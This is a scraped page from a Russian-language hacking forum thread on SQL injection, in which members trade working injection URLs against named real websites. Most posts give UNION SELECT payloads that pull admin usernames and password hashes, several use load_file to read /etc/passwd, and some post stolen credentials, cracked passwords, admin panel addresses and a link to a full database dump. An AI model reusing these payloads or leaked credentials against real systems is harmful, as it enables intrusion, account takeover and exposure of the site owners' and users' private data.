SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.jgkdo.org/hp/show_jg.php?id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,name,password),11,12+FROM+user+LIMIT+1,1/*

    Exozist:1688bc1a2663b585f4d0f7ba92f4ceb9: cracked by Ymrs: sb34ak20

    adminka: jgkdo.org/hp/opz_login.htm

    Ну, товарищи....покажем немцам..
     
  2. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Splitreason.com - PR 5
     
    #5742 sabe, 23 Jun 2008
    Last edited: 23 Jun 2008
  3. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    Колонки
    Code:
    http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x5553455253+limit+0,100/*
    Юзер/пасс
    Code:
    http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,concat(USERNAME,char(58),PASSWORD),5,6,7,8,9,10,11,12,13,14,15+from+users+limit+1,100/*
    Make fun!

    ______________
    159932, ты опоздал на 3 минуты))
     
    #5743 Лайт, 23 Jun 2008
    Last edited: 23 Jun 2008
    1 person likes this.
  4. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    ~39к юзверей
     
    2 people like this.
  5. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    root:6268a4a308ce2246:alex3.asc.edu:Monday1
    test:2e8ff8cf35525756:nagios.asc.edu
    root:6268a4a308ce2246:%Monday1
    test:2e8ff8cf35525756:intranet.asc.edu
    root:6268a4a308ce2246:129.66.12.21:Monday1
    phpesp:6268a4a308ce2246:alex.asc.edu:Monday1

    http://alex.state.al.us/admin/contextAdmin/contextAdmin.jsp?submit=Add+Context&addContextPath=&addContextDocBase=&removeContextName=

    16к юзеров

    http://alex.state.al.us/phpinfo.php

    ================================================
    http://www.onradio.gr/admin/index.php
    george:stelios
    есть cpanel - но не грузит ((
    https://onradio.gr:2083/

    ================================================
    vm_admin:686c821a80914aef822465b48019cd34:vm
     
    1 person likes this.
  6. D1ON1S

    D1ON1S New Member

    Joined:
    17 Jul 2007
    Messages:
    5
    Likes Received:
    3
    Reputations:
    0
    :)
     
    2 people like this.
  7. bakl

    bakl New Member

    Joined:
    29 May 2008
    Messages:
    10
    Likes Received:
    4
    Reputations:
    0
    Ляпис Трубецкой рулит))

    http://www.lyapis.com/anons.php?id=-1+union+select+1,user,3,4,5/*

    Database Version: 4.1.22-standard
    Database name: lyapis_lyapis
    User name: lyapis_lyapis@localhost
     
    #5747 bakl, 23 Jun 2008
    Last edited: 23 Jun 2008
    1 person likes this.
  8. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    Сегодня на нашем операционном столе сайт alfavideo.ru от группы компаний альфа арсенал, системы безопасности, аж самому смешно, хорошая у них безопасность)))).

    Приступим:

    Имена таблиц
    Колонки в таблице tbl_m_user
    Получаем всю инфу по админам
    Собстно логин и пасс 3х админчигов, которые были получены.
    И админка: http://www.alfavideo.ru/admin/

    Make fun!
     
    3 people like this.
  9. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    pr 3
    5.0.32-Debian_7etch5-log::crimelab@localhost::crimelab

    Присутствует раскрытие путей: /home/aidoann/crimelab/welcome.html
    есть так же файл прив:
    Наслаждайтесь
     
    #5749 gisTy, 23 Jun 2008
    Last edited: 24 Jun 2008
  10. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,191
    Reputations:
    430
    Поддержим лоад_филе
    Code:
     http://www.747.ru/board/main/show/?id=-9999+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10/* 
    Red_Red1 спс.
     
    #5750 Ch3ck, 23 Jun 2008
    Last edited: 23 Jun 2008
    2 people like this.
  11. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    PR 7
    PR 5
    version():5.0.27-standard-log
    user():[email protected]
    database():expressionin

    Есть раскрытие путей:
    Code:
    /vservers/expressionin/htdocs/
    Есть интересная табличка:
    PR 4
    version():4.1.11-Debian_4sarge8-log
    user():mallen@localhost
    database():mallen

    PR 3
    version():4.0.27-max-log
    user():[email protected]
    database():hornets247_v4_0

    PR 3
    version():4.1.22-log
    user():pmaste_blog@localhost
    database():pmaste_pmblog

    Есть раскрытие путей:
    PR 3
    version():5.0.45-log
    user():myelgranpode@localhost
    database():wp3

    PR 3
    version():4.1.21-standard-log
    user():pro_rabot@localhost
    database():pro_r31rabota

    PR 1
    version():5.0.24alyceu
    user():[email protected]
    database():leoq2_com_1

    PR N/A
    PR N/A
    version():4.0.26
    user():[email protected]
    database():ieeiuse_db
     
    #5751 gisTy, 24 Jun 2008
    Last edited: 3 Jul 2008
  12. furang

    furang Elder - Старейшина

    Joined:
    7 Apr 2007
    Messages:
    90
    Likes Received:
    14
    Reputations:
    0
    Бага

    Глянем имя БД
    Облом... а если так??? :)

    4.1.11-Debian_4sarge8-log::newtid@localhost::newtid

    Бага
    5.0.45-Debian_1ubuntu3.3-log::[email protected]::news_music

    Если чесно х3 откуда в линках пробелы побрались, их небыло!!!!! Поубирать не забудьте.
     
    #5752 furang, 24 Jun 2008
    Last edited: 24 Jun 2008
    1 person likes this.
  13. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    намного удобнее если использовать конструкцию
    Code:
    unhex(hex())
    например так:
     
    #5753 gisTy, 24 Jun 2008
    Last edited: 24 Jun 2008
  14. #urbaner

    #urbaner Member

    Joined:
    30 Mar 2008
    Messages:
    19
    Likes Received:
    13
    Reputations:
    -5
    Лайт https://www.sclan.info/showthread.php?t=1295 ....Блин хацкер крутой, увидел статью и скуль выложил тут(небось чтоб репу подняли лол)
    З.Ы.Делаем выводы!Сорри пожалуйста за оффтоп!
     
  15. Лайт

    Лайт Active Member

    Joined:
    23 May 2007
    Messages:
    63
    Likes Received:
    172
    Reputations:
    11
    Прости, но я там на зареген. Нашел скуль сам, если не веришь, почитай предыдущие мои посты по скулям, или ты думаешь что я настолько тупой и их тоже скопипастил?
    Этот сайт одна сплошная дырень, помимо моего шелла, там было еще 2, если быть точнее, то я раскрутил скуль 17/06/2008, а выложил только щас.
    Так что сам делай выводы.

    ЗЫ И уж кому, так точно не тебе меня учить, на себя лучше посмотри.

    ЗЗЫ Вот ты и спалился, я ждал когда ты появишся, тебе привет от 26, я думаю ты сразу поймешь о ком я, чето вы долго сайт свой поднимали...

    Если бы не 26 тогда тебе сказал про дыру, хер бы ты написал ту статью, я почему-то свой код запроса там узнаю. Я делал, отталкиваясь от этой статьи: https://forum.antichat.ru/thread43966.html, а вот тебе инфу слили...

    PS А вот и дамп ВСЕЙ базы, качайте на здоровье! http://ifolder.ru/7090064
    Дату создания файла только гляньте...

    Ты не на того наехал олень.
     
    #5755 Лайт, 24 Jun 2008
    Last edited: 24 Jun 2008
    4 people like this.
  16. theli

    theli New Member

    Joined:
    29 May 2008
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    http://easynotebook.890m.com/notelist.php?exid=2785J&n=15)%20UNION%20SELECT%201,database(),3,4,5,version(),7/*
    4.1.22-standard
    (хотя ничего полезного там нету к сожалению)

    слепая:
    http://procreditbank.com.ua/?cat=130&num=220&news=3467%20AND%201=2
    MYSQL 4.0.27-standard
    база mfb
    юзер [email protected]
     
    1 person likes this.
  17. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    понаходил скули...
    некоторые непохек..) разкручивайте кто может.. и сюда..)

    _____________________________________________
    где же моя подпись?
     
    #5757 sabe, 24 Jun 2008
    Last edited: 24 Jun 2008
    2 people like this.
  18. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,191
    Reputations:
    430
    Продолжим тему авиа**** и лоад_филе:
    Code:
    http://www.aviaport.ru/directory/publishers/?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,load_file(0x2f6574632f706173737764),27,28,29,30/*
    
    Версион, юзер, датабэйс через cast(version()/**/AS/**/binary)
     
    #5758 Ch3ck, 24 Jun 2008
    Last edited: 24 Jun 2008
    1 person likes this.
  19. Laipone

    Laipone New Member

    Joined:
    14 Aug 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    http://www.rotawheels.com/news.php?id=-3+union+select+1,user(),version(),database(),5/*
    4.1.20-log [email protected] 339068_rotanews

    http://www.phpbuddy.com/article.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database()),2,3,4,5,6
    4.1.21-standard:phpbud22_phpbudd@localhost:phpbud22_phpbuddy
     
    #5759 Laipone, 25 Jun 2008
    Last edited: 25 Jun 2008
  20. DJ ][akep

    DJ ][akep Member

    Joined:
    27 Jan 2008
    Messages:
    93
    Likes Received:
    20
    Reputations:
    1
    Крупный игровой портал : apollo.lv

     
    #5760 DJ ][akep, 25 Jun 2008
    Last edited: 25 Jun 2008
    1 person likes this.
Thread Status:
Not open for further replies.